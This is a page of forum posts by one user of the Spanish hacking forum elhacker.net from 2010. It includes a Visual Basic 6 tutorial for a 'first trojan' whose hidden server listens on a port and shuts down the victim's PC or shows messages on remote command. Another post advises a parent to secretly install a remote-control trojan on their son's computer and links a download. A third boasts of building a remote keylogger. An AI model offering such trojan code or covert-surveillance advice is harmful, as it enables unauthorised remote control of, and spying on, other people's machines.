elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 2 [3]
21  Seguridad Informática / Desafíos - Wargames / Re: Si respondes a la pregunta correcta, piensas como un psicópata. en: 18 Noviembre 2010, 04:32 am
Nosé no tiene logica la pregunta para mi,esta en el funeral ve a un hombre de su sueño,luego pasan unos dias.Mata a su hermana.??

Respuesta:Es una dawn enferma mental asesina Sicopata de *****

Respuesta2:estaba soñando?
22  Foros Generales / Dudas Generales / Re: Saber lo que hace mi hijo en: 18 Noviembre 2010, 04:13 am
bien,te recomiendo que le metas un troyano.Que te permite control remoto mira aca te dejo un video de mauro usando el troyano

 aca tenes el link de youtube : http://www.youtube.com/watch?v=LlmqdQxmOGc

link de descarga del troyano ;

http://www.mediafire.com/?xx2jq5ntdjj

Aviso cuando allas creado el server tenes que pasarselo a tu hijo y ejecutarselo en su compu
23  Foros Generales / Dudas Generales / Re: Especie de lupa en la barra de tareas... en: 18 Noviembre 2010, 03:47 am
Todos estan mal.Esa lupa la trae windows xd,cliqueaste en algo tenes que cliquear 2 veces la lupa desaparece creo.Ami tambien me paso,cuando la vi digo Wtf? me cage todo pero eso ya lo trae windows pero lo desactiva de alguna manera sin darte cuenta la activaste.
24  Foros Generales / Foro Libre / Re: Sus escritorios en: 17 Noviembre 2010, 20:20 pm
Mi escritorio


25  Programación / Programación Visual Basic / Re: Ayuda con SendData {Winsock} en: 17 Noviembre 2010, 16:26 pm
A.a si gracias blackZero ahora pude hacer un keylogger remoto =P 'Thanks'
26  Programación / Programación Visual Basic / Re: Mi primer troyano [Tutorial echo por mi],[Espero que les guste :D] en: 17 Noviembre 2010, 16:25 pm
Ami no me lo detecta ningun anti-virus.probe en otras pc tampoco.Solo fue un pequeño tutorial de un cliente y server,Lo que quiere decir un simple tutorial.Pero igual gracias por sus comentarios :D
27  Programación / Programación Visual Basic / Re: mantener presionada tecla-api de windows en: 17 Noviembre 2010, 02:54 am
Si necesitas que mantenga una tecla apretada es simple en un timer pones el intervalo adentro del timer pones esto
Código:
Sendkeys "Letra"
28  Programación / Programación Visual Basic / Re: Ayuda con SendData {Winsock} en: 16 Noviembre 2010, 23:44 pm
Hm, nop.Pero igual gracias,Che igual necesito esos codigos de cliente & servidor la idea es que desde el server yo escriba cualquier cosa en el textbox y llege al cliente
29  Programación / Programación Visual Basic / Mi primer troyano [Tutorial echo por mi],[Espero que les guste :D] en: 16 Noviembre 2010, 21:39 pm
                                                                        [Mi primer troyano]
Programas necesitados : Visual basic 6.0
Hola,buenos dias.Me pase por algunos post y encontre que mucha gente trata de hacer su primer troyano.Este es un troyano simple.Espero que comprendan que no deben copiar & pegar deben estudiar este codigo.Para avansar mas con el.


Bueno,Abrimos visual basic 6.0 Colocamos 2 label 2 textbox 2 botones(Dos botones por ahora) El primer commandbuton se va a llamar "Conectar" El segundo CommandButon "Desconectar"
Label1: Se va a llamar Ip/Host :
Label2: Se va a llamar Puerto :

Lo acomodon como ustedes quieran.Bueno agregamos el componente winsock y le ponemos el nombre Sock1 o como ustedes quieran

Código:
En el command1(Conectar) Lo clickeamos 2 veces Adentro de el commandbuton1(Conectar) Colocamos el sigiente codigo 
Sock1.close 'Cierra todas las conexiones
Sock1.connect text1.text,text2.text 'el text1.text es donde se ingresa la ip el text2.text el puerto

Listo el command1 lo tenemos listo ahora vamos al command2 lo clikeamos 2 veces.Adentro del commandbutton2 colocamos el sigiente codigo :
Código:
Sock1.close ' Cierra todas las conexiones

Ahora agregamos el boton3 commandbutton3 en propiedades eligimos el caption en caption escribimos Shutdown.Adentro del commandbutton3 ponemos :

Código:
If Winsock1.State = 7 Then 'Verifica que el winsock este conectado 7 = Conectado
    Winsock1.SendData "Shutdown" 'envia una señal al servidor la señal "Shutdown"
Else 'Si no estamos conectado pasa lo sigiente
    MsgBox "Error necesitas estar conectado.", vbInformation, "Error :"
End If
end sub

Ahora generamos el exe File>Make to exe lo guardamos.Ahora Hacemos otro proyecto que seria el servidor.Elegimos el exe standar ahora clickeamos 2 veces el formulario ponemos lo sigiente

Código:
Me.Visible = False 
App.TaskVisible = False 
App.Title = ""

Winsock1.LocalPort = "4902"
Winsock1.Listen

Ahora agregamos el componente winsock1 y una ves colocado en el formulario ponen en general clickear 2 veces form load ... y ponen el sigiente codigo en declaraciones

Private Const SPLITTER As String = "{Ex}"

Código:
Private Sub Winsock1_Close() 
Winsock1.Close
Winsock1.LocalPort = "4902"
Winsock1.Listen
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
Winsock1.Close
Winsock1.Accept requestID
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim Temp As String
Dim Temp2() As String

Winsock1.GetData Temp
Temp2 = Split(Temp, SPLITTER)
'SPLITTER which = "{Ex}"
Select Case Temp2(0)
    Case "Shutdown"
    Shell "shutdown -s -t 00" ' Esta es la señal de shutdown
    Case "Message"
    MsgBox Temp2(1)
End Select
End Sub
30  Programación / Programación Visual Basic / Ayuda con SendData {Winsock} en: 16 Noviembre 2010, 21:03 pm
                                                                      Winsock SendData

Hola.¿Alguien sabe como puedo que el servidor mande las palabras que estan escritas en el textbox?.Por ejemplo yo escribo en el servidor "Hola" en la caja de texto y que eso se mande por medio de un timer que llege al textbox del cliente.No pude resolver eso,Espero sus respuestas gracias.

Recuerden: Esto lo necesito para visual basic 6.0

Posdata:
Hola,espero que me reciban en su comúnidad.Espero que alla un espacio demas  :D y que no alla problemas conmigo,solo quiero aprender a programar & hacer amigos.No vine a bardear ni nada.Asi que espero que me traten bien gracias.
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines